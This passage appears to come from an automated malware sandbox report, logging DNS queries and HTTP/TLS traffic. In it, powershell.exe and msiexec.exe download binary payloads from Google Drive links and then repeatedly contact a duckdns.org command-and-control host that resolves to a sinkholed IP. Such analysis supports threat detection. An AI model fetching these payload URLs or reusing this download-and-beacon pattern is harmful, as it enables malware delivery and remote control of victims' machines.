X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 462080
    Last-Modified: Tue, 05 Nov 2024 23:06:17 GMT
    X-GUploader-UploadID: AHmUCY23L0giMBWo-gf_w0msrs2jxxVHFUIQ2m5V_CBaxdsYYE2QX0O0lMs2PNm7Ki705uYJcUZqhgfM-A
    Date: Thu, 14 Nov 2024 13:23:48 GMT
    Expires: Thu, 14 Nov 2024 13:23:48 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=0gXoUw==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    1.180.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    1.180.250.142.in-addr.arpa
    IN PTR
    Response
    1.180.250.142.in-addr.arpa
    IN PTR
    lhr25s32-in-f11e100net
  • flag-us
    DNS
    64.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    64.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-gb
    GET
    https://drive.google.com/uc?export=download&id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA
    msiexec.exe
    Remote address:
    142.250.187.206:443
    Request
    GET /uc?export=download&id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: drive.google.com
    Cache-Control: no-cache
    Response
    HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Thu, 14 Nov 2024 13:24:15 GMT
    Location: https://drive.usercontent.google.com/download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: script-src 'nonce-JQEBqyDb8an24rGTyYmryQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data:;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    c.pki.goog
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    216.58.201.99
  • flag-gb
    GET
    http://c.pki.goog/r/r1.crl
    msiexec.exe
    Remote address:
    216.58.201.99:80
    Request
    GET /r/r1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 854
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Thu, 14 Nov 2024 12:53:06 GMT
    Expires: Thu, 14 Nov 2024 13:43:06 GMT
    Cache-Control: public, max-age=3000
    Age: 1869
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • flag-us
    DNS
    o.pki.goog
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    o.pki.goog
    IN A
    Response
    o.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    216.58.201.99
  • flag-gb
    GET
    http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR
    msiexec.exe
    Remote address:
    216.58.201.99:80
    Request
    GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 472
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Thu, 14 Nov 2024 13:05:49 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 1106
  • flag-gb
    GET
    http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D
    msiexec.exe
    Remote address:
    216.58.201.99:80
    Request
    GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: o.pki.goog
    Response
    HTTP/1.1 200 OK
    Server: ocsp_responder
    Content-Length: 471
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Date: Thu, 14 Nov 2024 12:45:22 GMT
    Cache-Control: public, max-age=14400
    Content-Type: application/ocsp-response
    Age: 2333
  • flag-gb
    GET
    https://drive.usercontent.google.com/download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download
    msiexec.exe
    Remote address:
    142.250.180.1:443
    Request
    GET /download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Security-Policy: sandbox
    Content-Security-Policy: default-src 'none'
    Content-Security-Policy: frame-ancestors 'none'
    X-Content-Security-Policy: sandbox
    Cross-Origin-Opener-Policy: same-origin
    Cross-Origin-Embedder-Policy: require-corp
    Cross-Origin-Resource-Policy: same-site
    X-Content-Type-Options: nosniff
    Content-Disposition: attachment; filename="fKHFybIJZyCEV7.bin"
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: false
    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
    Accept-Ranges: bytes
    Content-Length: 493120
    Last-Modified: Sun, 03 Nov 2024 21:43:54 GMT
    X-GUploader-UploadID: AFiumC77ns-tcKfkcC2v6SMUUYmGA40WMrr2yskT1_lQME9mldCPfYdSGqTtobPfILgiqXzFSkQ
    Date: Thu, 14 Nov 2024 13:24:18 GMT
    Expires: Thu, 14 Nov 2024 13:24:18 GMT
    Cache-Control: private, max-age=0
    X-Goog-Hash: crc32c=7cbDrw==
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
  • flag-us
    DNS
    99.201.58.216.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    99.201.58.216.in-addr.arpa
    IN PTR
    Response
    99.201.58.216.in-addr.arpa
    IN PTR
    prg03s02-in-f31e100net
    99.201.58.216.in-addr.arpa
    IN PTR
    lhr48s48-in-f3�G
    99.201.58.216.in-addr.arpa
    IN PTR
    prg03s02-in-f99�G
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    a458386d9.duckdns.org
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    a458386d9.duckdns.org
    IN A
    Response
    a458386d9.duckdns.org
    IN A
    192.169.69.26
  • flag-us
    DNS
    a458386d9.duckdns.org
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    a458386d9.duckdns.org
    IN A
    Response
  • flag-us
    DNS
    26.69.169.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    26.69.169.192.in-addr.arpa
    IN PTR
    Response
    26.69.169.192.in-addr.arpa
    IN PTR
    sinkholehyascom
  • flag-us
    DNS
    180.129.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.129.81.91.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    31.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    31.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    a458386d9.duckdns.org
    msiexec.exe
    Remote address:
    8.8.8.8:53
    Request
    a458386d9.duckdns.org
    IN A
    Response
    a458386d9.duckdns.org
    IN A
    192.169.69.26
  • 142.250.187.206:443
    https://drive.google.com/uc?export=download&id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw
    tls, http
    powershell.exe
    917 B
     9.0kB
     9
    11

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw

    HTTP Response

    303
  • 142.250.180.1:443
    https://drive.usercontent.google.com/download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download
    tls, http
    powershell.exe
    9.0kB
     496.2kB
     185
    361

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1vlinawCCDdnC8GarsrI_EoyH1NCS58Cw&export=download

    HTTP Response

    200
  • 142.250.187.206:443
    https://drive.google.com/uc?export=download&id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA
    tls, http
    msiexec.exe
    1.3kB
     10.2kB
     16
    13

    HTTP Request

    GET https://drive.google.com/uc?export=download&id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA

    HTTP Response

    303
  • 216.58.201.99:80
    http://c.pki.goog/r/r1.crl
    http
    msiexec.exe
    395 B
     1.8kB
     6
    5

    HTTP Request

    GET http://c.pki.goog/r/r1.crl

    HTTP Response

    200
  • 216.58.201.99:80
    http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D
    http
    msiexec.exe
    830 B
     1.6kB
     8
    5

    HTTP Request

    GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDzySkSNBgXtBKLijHUmMxR

    HTTP Response

    200

    HTTP Request

    GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACECt1gF5RMj4mChEciVJIkog%3D

    HTTP Response

    200
  • 142.250.180.1:443
    https://drive.usercontent.google.com/download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download
    tls, http
    msiexec.exe
    18.4kB
     528.8kB
     388
    385

    HTTP Request

    GET https://drive.usercontent.google.com/download?id=1FzV1vypLGpKExTpM69ehSsFhTyQA1RIA&export=download

    HTTP Response

    200
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    tls
    msiexec.exe
    304 B
     88 B
     3
    2
  • 192.169.69.26:3256
    a458386d9.duckdns.org
    msiexec.exe
    52 B
     1
  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
     133 B
     1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    drive.google.com
    dns
    msiexec.exe
    62 B
     78 B
     1
    1

    DNS Request

    drive.google.com

    DNS Response

    142.250.187.206

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    206.187.250.142.in-addr.arpa
    dns
    74 B
     113 B
     1
    1

    DNS Request

    206.187.250.142.in-addr.arpa

  • 8.8.8.8:53
    drive.usercontent.google.com
    dns
    msiexec.exe
    74 B
     90 B
     1
    1

    DNS Request

    drive.usercontent.google.com

    DNS Response

    142.250.180.1

  • 8.8.8.8:53
    1.180.250.142.in-addr.arpa
    dns
    72 B
     110 B
     1
    1

    DNS Request

    1.180.250.142.in-addr.arpa

  • 8.8.8.8:53
    64.159.190.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    64.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    c.pki.goog
    dns
    msiexec.exe
    56 B
     107 B
     1
    1

    DNS Request

    c.pki.goog

    DNS Response

    216.58.201.99

  • 8.8.8.8:53
    o.pki.goog
    dns
    msiexec.exe
    56 B
     107 B
     1
    1

    DNS Request

    o.pki.goog

    DNS Response

    216.58.201.99

  • 8.8.8.8:53
    99.201.58.216.in-addr.arpa
    dns
    72 B
     169 B
     1
    1

    DNS Request

    99.201.58.216.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
     160 B
     1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
